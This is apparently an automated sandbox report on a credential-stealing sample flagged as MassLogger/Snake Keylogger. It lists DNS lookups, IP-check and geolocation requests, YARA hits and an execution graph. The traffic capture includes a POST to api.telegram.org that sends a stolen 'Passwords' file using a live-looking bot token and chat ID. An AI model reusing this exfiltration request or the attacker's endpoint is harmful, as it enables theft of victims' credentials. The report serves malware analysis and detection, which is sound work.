                                                                          Jan 11, 2025 08:00:25.638923883 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 08:00:55.323533058 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 08:00:55.328507900 CET8049699132.226.247.73192.168.2.7
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2025 07:59:13.449399948 CET5692453192.168.2.71.1.1.1
                                                                          Jan 11, 2025 07:59:13.456276894 CET53569241.1.1.1192.168.2.7
                                                                          Jan 11, 2025 07:59:14.584918022 CET6165953192.168.2.71.1.1.1
                                                                          Jan 11, 2025 07:59:14.592243910 CET53616591.1.1.1192.168.2.7
                                                                          Jan 11, 2025 07:59:20.640125990 CET5298953192.168.2.71.1.1.1
                                                                          Jan 11, 2025 07:59:20.649105072 CET53529891.1.1.1192.168.2.7
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 11, 2025 07:59:13.449399948 CET192.168.2.71.1.1.10x21d5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.584918022 CET192.168.2.71.1.1.10xe5fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:20.640125990 CET192.168.2.71.1.1.10xccf5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:13.456276894 CET1.1.1.1192.168.2.70x21d5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:14.592243910 CET1.1.1.1192.168.2.70xe5fNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 07:59:20.649105072 CET1.1.1.1192.168.2.70xccf5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                          • reallyfreegeoip.org
                                                                          • api.telegram.org
                                                                          • checkip.dyndns.org
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.749699132.226.247.73802172C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 11, 2025 07:59:13.468347073 CET151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Jan 11, 2025 07:59:14.143743992 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 06:59:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                          Jan 11, 2025 07:59:14.206988096 CET127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Jan 11, 2025 07:59:14.416918993 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 06:59:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                          Jan 11, 2025 07:59:20.427191973 CET127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Jan 11, 2025 07:59:20.635963917 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 06:59:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.749700104.21.80.14432172C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-11 06:59:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2025-01-11 06:59:15 UTC857INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 06:59:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 362
                                                                          Connection: close
                                                                          Age: 1893544
                                                                          Cache-Control: max-age=31536000
                                                                          cf-cache-status: HIT
                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8gczGjKRCmKMdpMJ%2F9K56WIcyhFB%2FSvguWBFoV4sTy1MHg6OsvCM%2BTFO7Hclr0fdbuiT9qGrhEtb8uLBWmjzAkwc9DcSEMVZWP7sXiGfv3BLf9eQagwedWLHIVY14SAxz%2F2nTPAE"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 900305e4484042d2-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1532&rtt_var=586&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1850443&cwnd=229&unsent_bytes=0&cid=cc549d14cba74f01&ts=235&x=0"
                                                                          2025-01-11 06:59:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.749737149.154.167.2204432172C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-11 06:59:21 UTC299OUTPOST /bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455776561&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary================8dd31e38f96b8f2
                                                                          Host: api.telegram.org
                                                                          Content-Length: 1090
                                                                          Connection: Keep-Alive
                                                                          2025-01-11 06:59:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 33 38 66 39 36 62 38 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: --===============8dd31e38f96b8f2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                          2025-01-11 06:59:21 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Sat, 11 Jan 2025 06:59:21 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 551
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2025-01-11 06:59:21 UTC551INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 33 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 33 38 36 31 39 37 33 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6f 76 61 6c 6f 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6e 6f 76 6f 6c 6f 67 67 65 72 70 72 69 6e 63 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 35 35 37 37 36 35 36 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 7a 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 6e 79 65 6e 7a 65 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66
                                                                          Data Ascii: {"ok":true,"result":{"message_id":21386,"from":{"id":8138619732,"is_bot":true,"first_name":"novalogger","username":"novologgerprincebot"},"chat":{"id":7455776561,"first_name":"Nze","username":"Onyenze001","type":"private"},"date":1736578761,"document":{"f


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:5
                                                                          Start time:01:59:06
                                                                          Start date:11/01/2025
                                                                          Path:C:\Users\user\Desktop\JWPRnfqs3n.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\JWPRnfqs3n.exe"
                                                                          Imagebase:0x800000
                                                                          File size:992'768 bytes
                                                                          MD5 hash:820C5B5F7FD86172A9637E4AF12FAD06
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:01:59:11
                                                                          Start date:11/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\JWPRnfqs3n.exe"
                                                                          Imagebase:0x2a0000
                                                                          File size:45'984 bytes
                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3.6%
                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                            Signature Coverage:9%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:60
                                                                            execution_graph 103995 803633 103996 80366a 103995->103996 103997 8036e5 103996->103997 103998 8036e7 103996->103998 103999 803688 103996->103999 104000 8036ca DefWindowProcW 103997->104000 104001 8036ed 103998->104001 104002 83d0cc 103998->104002 104003 803695 103999->104003 104004 80374b PostQuitMessage 103999->104004 104010 8036d8 104000->104010 104005 8036f2 104001->104005 104006 803715 SetTimer RegisterWindowMessageW 104001->104006 104050 811070 10 API calls Mailbox 104002->104050 104008 8036a0 104003->104008 104009 83d154 104003->104009 104004->104010 104011 8036f9 KillTimer 104005->104011 104012 83d06f 104005->104012 104006->104010 104014 80373e CreatePopupMenu 104006->104014 104015 803755 104008->104015 104016 8036a8 104008->104016 104066 862527 71 API calls _memset 104009->104066 104047 80443a Shell_NotifyIconW _memset 104011->104047 104018 83d074 104012->104018 104019 83d0a8 MoveWindow 104012->104019 104013 83d0f3 104051 811093 331 API calls Mailbox 104013->104051 104014->104010 104040 8044a0 104015->104040 104022 8036b3 104016->104022 104023 83d139 104016->104023 104026 83d097 SetFocus 104018->104026 104027 83d078 104018->104027 104019->104010 104029 8036be 104022->104029 104030 83d124 104022->104030 104023->104000 104065 857c36 59 API calls Mailbox 104023->104065 104024 83d166 104024->104000 104024->104010 104026->104010 104027->104029 104031 83d081 104027->104031 104028 80370c 104048 803114 DeleteObject DestroyWindow Mailbox 104028->104048 104029->104000 104052 80443a Shell_NotifyIconW _memset 104029->104052 104064 862d36 81 API calls _memset 104030->104064 104049 811070 10 API calls Mailbox 104031->104049 104036 83d134 104036->104010 104038 83d118 104053 80434a 104038->104053 104041 8044b7 _memset 104040->104041 104042 804539 104040->104042 104067 80407c 104041->104067 104042->104010 104044 804522 KillTimer SetTimer 104044->104042 104045 8044de 104045->104044 104046 83d4ab Shell_NotifyIconW 104045->104046 104046->104044 104047->104028 104048->104010 104049->104010 104050->104013 104051->104029 104052->104038 104054 804375 _memset 104053->104054 104186 804182 104054->104186 104058 8043fa 104059 804430 Shell_NotifyIconW 104058->104059 104060 804414 Shell_NotifyIconW 104058->104060 104061 804422 104059->104061 104060->104061 104062 80407c 61 API calls 104061->104062 104063 804429 104062->104063 104063->103997 104064->104036 104065->103997 104066->104024 104068 804098 104067->104068 104088 80416f Mailbox 104067->104088 104089 807a16 104068->104089 104071 8040b3 104094 807bcc 104071->104094 104072 83d3c8 LoadStringW 104075 83d3e2 104072->104075 104074 8040c8 104074->104075 104076 8040d9 104074->104076 104077 807b2e 59 API calls 104075->104077 104078 8040e3 104076->104078 104079 804174 104076->104079 104080 83d3ec 104077->104080 104103 807b2e 104078->104103 104112 808047 104079->104112 104084 8040ed _memset _wcscpy 104080->104084 104116 807cab 104080->104116 104086 804155 Shell_NotifyIconW 104084->104086 104085 83d40e 104087 807cab 59 API calls 104085->104087 104086->104088 104087->104084 104088->104045 104123 820db6 104089->104123 104091 807a3b 104133 808029 104091->104133 104095 807c45 104094->104095 104096 807bd8 __wsetenvp 104094->104096 104165 807d2c 104095->104165 104098 807c13 104096->104098 104099 807bee 104096->104099 104100 808029 59 API calls 104098->104100 104164 807f27 59 API calls Mailbox 104099->104164 104102 807bf6 _memmove 104100->104102 104102->104074 104104 807b40 104103->104104 104105 83ec6b 104103->104105 104173 807a51 104104->104173 104179 857bdb 59 API calls _memmove 104105->104179 104108 807b4c 104108->104084 104109 83ec75 104110 808047 59 API calls 104109->104110 104111 83ec7d Mailbox 104110->104111 104113 808052 104112->104113 104114 80805a 104112->104114 104180 807f77 59 API calls 2 library calls 104113->104180 104114->104084 104117 83ed4a 104116->104117 104118 807cbf 104116->104118 104120 808029 59 API calls 104117->104120 104181 807c50 104118->104181 104122 83ed55 __wsetenvp _memmove 104120->104122 104121 807cca 104121->104085 104126 820dbe 104123->104126 104125 820dd8 104125->104091 104126->104125 104128 820ddc std::exception::exception 104126->104128 104136 82571c 104126->104136 104153 8233a1 DecodePointer 104126->104153 104154 82859b RaiseException 104128->104154 104130 820e06 104155 8284d1 58 API calls _free 104130->104155 104132 820e18 104132->104091 104134 820db6 Mailbox 59 API calls 104133->104134 104135 8040a6 104134->104135 104135->104071 104135->104072 104137 825797 104136->104137 104146 825728 104136->104146 104162 8233a1 DecodePointer 104137->104162 104139 82579d 104163 828b28 58 API calls __getptd_noexit 104139->104163 104142 82575b RtlAllocateHeap 104143 82578f 104142->104143 104142->104146 104143->104126 104145 825783 104160 828b28 58 API calls __getptd_noexit 104145->104160 104146->104142 104146->104145 104147 825733 104146->104147 104151 825781 104146->104151 104159 8233a1 DecodePointer 104146->104159 104147->104146 104156 82a16b 58 API calls 2 library calls 104147->104156 104157 82a1c8 58 API calls 8 library calls 104147->104157 104158 82309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104147->104158 104161 828b28 58 API calls __getptd_noexit 104151->104161 104153->104126 104154->104130 104155->104132 104156->104147 104157->104147 104159->104146 104160->104151 104161->104143 104162->104139 104163->104143 104164->104102 104166 807d43 _memmove 104165->104166 104167 807d3a 104165->104167 104166->104102 104167->104166 104169 807e4f 104167->104169 104170 807e62 104169->104170 104171 807e5f _memmove 104169->104171 104172 820db6 Mailbox 59 API calls 104170->104172 104171->104166 104172->104171 104174 807a5f 104173->104174 104175 807a85 _memmove 104173->104175 104174->104175 104176 820db6 Mailbox 59 API calls 104174->104176 104175->104108 104177 807ad4 104176->104177 104178 820db6 Mailbox 59 API calls 104177->104178 104178->104175 104179->104109 104180->104114 104182 807c5f __wsetenvp 104181->104182 104183 808029 59 API calls 104182->104183 104184 807c70 _memmove 104182->104184 104185 83ed07 _memmove 104183->104185 104184->104121 104187 83d423 104186->104187 104188 804196 104186->104188 104187->104188 104189 83d42c DestroyIcon 104187->104189 104188->104058 104190 862f94 62 API calls _W_store_winword 104188->104190 104189->104188 104190->104058 104191 83fe27 104204 81f944 104191->104204 104193 83fe3d 104194 83fe53 104193->104194 104195 83febe 104193->104195 104293 809e5d 60 API calls 104194->104293 104213 80fce0 104195->104213 104197 83fe92 104199 84089c 104197->104199 104200 83fe9a 104197->104200 104295 869e4a 89 API calls 4 library calls 104199->104295 104294 86834f 59 API calls Mailbox 104200->104294 104203 83feb2 Mailbox 104205 81f950 104204->104205 104206 81f962 104204->104206 104296 809d3c 60 API calls Mailbox 104205->104296 104208 81f991 104206->104208 104209 81f968 104206->104209 104297 809d3c 60 API calls Mailbox 104208->104297 104211 820db6 Mailbox 59 API calls 104209->104211 104212 81f95a 104211->104212 104212->104193 104298 808180 104213->104298 104215 80fd3d 104217 84472d 104215->104217 104277 8106f6 104215->104277 104303 80f234 104215->104303 104421 869e4a 89 API calls 4 library calls 104217->104421 104220 84488d 104225 80fe4c 104220->104225 104272 844742 104220->104272 104427 87a2d9 85 API calls Mailbox 104220->104427 104221 80fe3e 104221->104220 104221->104225 104425 8566ec 59 API calls 2 library calls 104221->104425 104222 844b53 104222->104272 104442 869e4a 89 API calls 4 library calls 104222->104442 104223 810517 104232 820db6 Mailbox 59 API calls 104223->104232 104224 820db6 59 API calls Mailbox 104256 80fdd3 104224->104256 104225->104222 104233 8448f9 104225->104233 104307 80837c 104225->104307 104226 8447d7 104226->104272 104423 869e4a 89 API calls 4 library calls 104226->104423 104229 844848 104426 8560ef 59 API calls 2 library calls 104229->104426 104241 810545 _memmove 104232->104241 104242 844917 104233->104242 104429 8085c0 59 API calls Mailbox 104233->104429 104235 844755 104235->104226 104422 80f6a3 331 API calls 104235->104422 104238 84486b 104244 809ea0 331 API calls 104238->104244 104239 8448b2 Mailbox 104239->104225 104428 8566ec 59 API calls 2 library calls 104239->104428 104249 820db6 Mailbox 59 API calls 104241->104249 104246 844928 104242->104246 104430 8085c0 59 API calls Mailbox 104242->104430 104243 80fea4 104247 844ad6 104243->104247 104248 80ff32 104243->104248 104263 810179 Mailbox _memmove 104243->104263 104244->104220 104246->104263 104431 8560ab 59 API calls Mailbox 104246->104431 104440 869ae7 60 API calls 104247->104440 104252 820db6 Mailbox 59 API calls 104248->104252 104259 810106 _memmove 104249->104259 104257 80ff39 104252->104257 104255 80ffe6 104273 808047 59 API calls 104255->104273 104279 810007 104255->104279 104256->104221 104256->104223 104256->104224 104256->104235 104256->104241 104265 84480c 104256->104265 104256->104272 104395 809ea0 104256->104395 104257->104277 104314 8109d0 104257->104314 104259->104263 104292 810162 104259->104292 104419 809c90 59 API calls Mailbox 104259->104419 104260 809ea0 331 API calls 104262 844a87 104260->104262 104262->104272 104435 8084c0 104262->104435 104271 844ab2 104263->104271 104263->104277 104278 810398 104263->104278 104280 820db6 59 API calls Mailbox 104263->104280 104286 844a1c 104263->104286 104291 844a4d 104263->104291 104393 808740 68 API calls __cinit 104263->104393 104394 808660 68 API calls 104263->104394 104432 865937 68 API calls 104263->104432 104433 8089b3 69 API calls Mailbox 104263->104433 104434 809d3c 60 API calls Mailbox 104263->104434 104424 869e4a 89 API calls 4 library calls 104265->104424 104270 80ffb2 104270->104241 104270->104255 104270->104277 104439 869e4a 89 API calls 4 library calls 104271->104439 104273->104279 104420 869e4a 89 API calls 4 library calls 104277->104420 104278->104203 104279->104277 104281 844b24 104279->104281 104285 81004c 104279->104285 104280->104263 104441 809d3c 60 API calls Mailbox 104281->104441 104283 8100d8 104391 809d3c 60 API calls Mailbox 104283->104391 104285->104222 104285->104277 104285->104283 104288 820db6 Mailbox 59 API calls 104286->104288 104287 8100eb 104287->104277 104392 8082df 59 API calls Mailbox 104287->104392 104288->104291 104291->104260 104292->104203 104293->104197 104294->104203 104295->104203 104296->104212 104297->104212 104299 80818f 104298->104299 104302 8081aa 104298->104302 104300 807e4f 59 API calls 104299->104300 104301 808197 CharUpperBuffW 104300->104301 104301->104302 104302->104215 104304 80f251 104303->104304 104305 80f272 104304->104305 104443 869e4a 89 API calls 4 library calls 104304->104443 104305->104256 104308 80838d 104307->104308 104309 83edbd 104307->104309 104310 820db6 Mailbox 59 API calls 104308->104310 104311 808394 104310->104311 104312 8083b5 104311->104312 104444 808634 59 API calls Mailbox 104311->104444 104312->104233 104312->104243 104315 844cc3 104314->104315 104327 8109f5 104314->104327 104504 869e4a 89 API calls 4 library calls 104315->104504 104317 810ce4 104318 810cfa 104317->104318 104501 811070 10 API calls Mailbox 104317->104501 104318->104270 104321 810ee4 104321->104318 104323 810ef1 104321->104323 104322 810a4b PeekMessageW 104349 810a05 Mailbox 104322->104349 104502 811093 331 API calls Mailbox 104323->104502 104326 810ef8 LockWindowUpdate DestroyWindow GetMessageW 104326->104318 104329 810f2a 104326->104329 104327->104349 104505 809e5d 60 API calls 104327->104505 104506 856349 331 API calls 104327->104506 104328 844e81 Sleep 104328->104349 104330 845c58 TranslateMessage DispatchMessageW GetMessageW 104329->104330 104330->104330 104332 845c88 104330->104332 104332->104318 104333 844d50 TranslateAcceleratorW 104334 810e43 PeekMessageW 104333->104334 104333->104349 104334->104349 104335 810ea5 TranslateMessage DispatchMessageW 104335->104334 104336 84581f WaitForSingleObject 